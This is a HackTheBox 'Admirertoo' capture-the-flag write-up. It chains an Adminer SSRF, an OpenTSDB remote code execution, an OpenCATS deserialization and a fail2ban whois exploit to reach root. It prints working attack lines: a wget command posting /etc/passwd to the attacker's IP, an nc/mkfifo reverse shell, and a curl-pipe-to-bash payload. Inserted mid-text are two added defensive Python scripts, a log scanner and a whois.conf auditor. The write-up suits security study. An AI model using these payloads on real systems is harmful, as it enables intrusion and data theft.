CTF-Writeups/HackTheBox/Adminertoo.md
2022-05-28 20:49:26 +05:00


HackTheBox-Admirertoo

NMAP

PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:33:47:e6:5f:1f:2e:fd:45:a4:ee:6b:78:fb:c0:e4 (RSA)
|   256 4b:28:53:64:92:57:84:77:5f:8d:bf:af:d5:22:e1:10 (ECDSA)
|_  256 71:ee:8e:e5:98:ab:08:43:3b:86:29:57:23:26:e9:10 (ED25519)
80/tcp    open     http           Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Admirer
4242/tcp  filtered vrml-multi-use
16010/tcp filtered unknown
16030/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the web server we can see that a default template is used.

Running gobuster to fuzz for files didn't show anything interesting.

We can see a chat bubble on the page, but it doesn't really make any requests.

Making an invalid request shows a 404 error page, but it also reveals a domain name.

Using this we can try to enumerate subdomains with wfuzz, so add admirer-gallery.htb to the /etc/hosts file:

 wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://admirer-gallery.htb' -H "Host: FUZZ.admirer-gallery.htb" --hl 268

Checking the source of the page, we can see that the password is already present in a hidden parameter.

After logging in, it shows that this user doesn't have permissions, so we can only view what's in the database, and there wasn't anything interesting there.

We only see the gallery table, which just contains the pictures we saw on the gallery page.

Looking for exploits for Adminer 4.7.8 led to an SSRF vulnerability:

https://github.com/advisories/GHSA-x5r2-hj5c-8jx6

Let's try to replicate it; the advisory also provides the script that was used in the PoC.

So I intercepted the login request and tried the Adminer drivers one by one to see on which one we'd get a request:

https://github.com/vrana/adminer/tree/master/adminer/drivers

Changing the driver to elastic and the server to our IP got a callback.

And if we go back to the login page, we'll see that the adminer gallery source code gets reflected on the database page.

If we look back at our scan, we saw a few filtered ports.

Making a request to port 4242 through the SSRF shows us a different response.

From the response we see that OpenTSDB is running on port 4242, and looking it up on Google shows it has a remote code execution vulnerability through a GET parameter.

I copied the payload from here:

https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2020/CVE-2020-35476.yaml

and changed the m parameter to http.stats.web.hits:

/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system('wget%20--post-file%20/etc/passwd%20http://10.10.14.71/:2222/')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

With this payload I am just checking whether I can read the /etc/passwd file, running it with the same Python script.

Looking at our netcat listener, we'll see that the /etc/passwd file was sent to our port 2222. To get a shell I tried running the reverse shell command directly inside the system argument, but it wasn't being executed, so I used curl to download a shell script containing a netcat reverse shell and piped it to bash to execute it:

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.71 2222 >/tmp/f
sudo python2 exploit.py -p 80 "http://10.10.11.137:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system('curl%20http://10.10.14.71:4444/shell.sh%7Cbash')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
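As an added defender-side example (not part of the original writeup), the check below parses constructed Apache-style access-log lines for OpenTSDB /q requests and flags any xrange or yrange value that isn't a plain [low:high] range, which is how the CVE-2020-35476 payload above would stand out in logs; the log format and the "legitimate range" regex are assumptions.

```python
"""Flag OpenTSDB /q requests whose range parameters carry injected gnuplot code.

Added example, not from the original writeup.  Assumptions: logs are in the
Apache common log format and a legitimate yrange/xrange looks like
"[low:high]" with numeric (possibly empty) bounds, e.g. "[0:]".
"""
import re
from urllib.parse import parse_qs, urlsplit

# What OpenTSDB expects for xrange/yrange: optional [ ] around "num:num".
RANGE_OK = re.compile(r"^\[?[-+0-9.eE]*:[-+0-9.eE]*\]?$")
# Tokens that never belong in a plot range (gnuplot system(), shell metachars).
SUSPICIOUS = re.compile(r"system\s*\(|`|\$\(|[|;]", re.IGNORECASE)
# Common Log Format prefix: client - - [timestamp] "METHOD path HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)

def check_line(line):
    """Return a finding dict for a suspicious /q request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    if url.path != "/q":
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    for key in ("xrange", "yrange"):
        for value in params.get(key, []):
            if not RANGE_OK.match(value) or SUSPICIOUS.search(value):
                return {"src": m.group("src"), "ts": m.group("ts"),
                        "param": key, "value": value}
    return None

def scan(lines):
    """Run check_line over an iterable of log lines and collect the findings."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample: one normal graph request, one carrying the injection above.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Oct/2020:15:50:01 +0000] "GET /q?start=1h-ago&m=sum:http.stats.web.hits&yrange=%5B0:%5D&json HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Oct/2020:15:56:44 +0000] "GET /q?start=2000/10/21-00:00:00&m=sum:http.stats.web.hits&yrange=%5B33:system(\'wget%20--post-file%20/etc/passwd%20http://10.10.14.71/:2222/\')%5D&json HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```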

Stabilizing the shell with python3.

I tried to run sudo -l to see if I could run anything as another user, but it failed.

In adminer's directory there's a file named servers.php which has credentials for the database.

Using this password for the jennifer account, we can switch to that user.

I checked for SUID binaries, but there wasn't any custom binary or any binary that shouldn't be SUID; only the default ones were shown. Looking at local ports, we can see that port 8080 is open.

Making a request to that port shows that it's running software known as OpenCATS.

So we need to do port forwarding so that we can access it through our browser:

ssh -L 3333:127.0.0.1:8080 jennifer@10.10.11.137

Here -L tells ssh to do local port forwarding. The first port we specify (3333) is the local port that will carry the forwarded connection from the target machine. After that we specify 127.0.0.1, because we want to forward a port that is listening on the target machine itself, and finally the port whose traffic we want forwarded, which is port 8080, where OpenCATS is running.

Visiting the port in the browser shows us the login page for OpenCATS.

Looking for database credentials, we find the credentials for the database that OpenCATS uses in /opt/opencats/config.php.

Selecting the users table, we can see two users. We already have jennifer's password, but we can change admin's password by updating the password hash.

So first generate an MD5 hash of whatever text you want to set as the admin user's password.

Now update the password value for the admin user in the table:

UPDATE user SET password = '1bc29b36f623ba82aaf6724fd3b16718'  
WHERE user_id=1;

And now we can log in as the admin user, since we have changed the password in the database.

This version of OpenCATS is vulnerable to a PHP deserialization attack:

https://snoopysecurity.github.io/web-application-security/2021/01/16/09_opencats_php_object_injection.html

But the issue is that we don't know what our payload should be: we have port forwarded this, it's not running from /var/www/html, and we don't know which user the site is running as. Looking in /opt/opencats, we saw a file owned by the group devel.

And this user isn't allowed to log in.

So it could be that the site is running as the devel user, and we need to find which folder is owned by this group so we can write a file to it.

Also in /etc there's a folder named fail2ban, which is watching SSH. Looking at its configuration, we can see it bans the IP for 1 minute if there's a login failure for the root user.

There's an RCE in the fail2ban service, so we can abuse it by writing a whois.conf file in /usr/local/etc through the OpenCATS PHP deserialization:

https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm

First, create a whois.conf file on our local machine containing our IP address.

Run phpggc to generate a serialized object.

From the OpenCATS activities page, click any column name and intercept the request.

Replace the serialized object in ActivityDataGrid.

With this we are able to create a whois.conf file, but it isn't in the correct format.

And if we run whois IP it gives an error.

The reason is that whois.conf entries are regex patterns:

https://github.com/rfc1036/whois/blob/next/whois.conf

So we have to turn the content we get in this file into a regex pattern. The file contains:

[{"Expires":1,"Discard":false,"Value":"10.10.16.24\n"}]

We need to add }] at the start of our value, which closes this string:

[{"Expires":1,"Discard":false,"Value":"}]

In a regex, square brackets form a character class, so this part is treated as a pattern matching any one of the characters inside them, and the value becomes:

}] IP

Now we need to add a regex OR operator after the pattern, so that the two alternatives are compared, followed by the IP:

}]| [IP]

Now when we run whois IP, we get a connection on port 43 (the port used by whois).
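As an added defender-side example (not from the writeup), the audit below reads a whois.conf in the "pattern server" format linked above and reports the tell-tale signs of the injected JSON residue: entries that don't split into two fields, patterns that match every query, and servers that are bare IP addresses. The sample file is constructed, and it assumes Python's re is close enough to the POSIX extended regexes whois uses for these checks.

```python
"""Audit a whois.conf for catch-all or tampered entries.

Added example, not from the original writeup.  whois(1) reads "pattern server"
lines and sends the query to the first server whose extended regex matches, so
an injected line that turns into a catch-all pattern redirects every lookup,
including the one fail2ban performs.  Assumption: Python's re behaves like
POSIX ERE for the patterns checked here.
"""
import ipaddress
import re

# A sane pattern should never match all of these at once.
PROBES = ("example.test", "192.0.2.1", "")

def audit_whois_conf(text):
    """Return a list of (lineno, reason, line) findings for the given file text."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments are fine
        fields = line.split()
        if len(fields) != 2:
            findings.append((n, "malformed entry", line))
            continue
        pattern, server = fields
        try:
            rx = re.compile(pattern, re.IGNORECASE)
        except re.error:
            findings.append((n, "invalid regex", line))
            continue
        if all(rx.search(p) for p in PROBES):
            findings.append((n, "catch-all pattern", line))
        try:
            ipaddress.ip_address(server)  # legitimate entries use hostnames
            findings.append((n, "server is a raw IP address", line))
        except ValueError:
            pass
    return findings

# Constructed sample: two ordinary-looking entries, then the injected residue.
SAMPLE_CONF = """\
# constructed whois.conf for the audit example
\\.example\\.test$   whois.nic.test
^192\\.0\\.2\\.      whois.rir.test
[{"Expires":1,"Discard":false,"Value":"}]| 10.10.16.24
"}]
"""

if __name__ == "__main__":
    for lineno, reason, line in audit_whois_conf(SAMPLE_CONF):
        print(f"line {lineno}: {reason}: {line}")
```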

Following the fail2ban RCE advisory, we need to create a file that will be served in response to the whois request on port 43, containing our reverse shell prefixed with ~| because that causes the command to be executed.

We need to listen on this port and serve this file as the response.

I had trouble running this command with nc, so I had to install ncat; I don't know what the major difference is, but with ncat it was working.

Listen on the port where we will get the connection back from the reverse shell.

And lastly, trigger fail2ban by attempting to log in as the root user with multiple failed attempts. This causes whois to run against our IP, our listener answers the request on port 43 with the reverse shell, and it gets executed.

References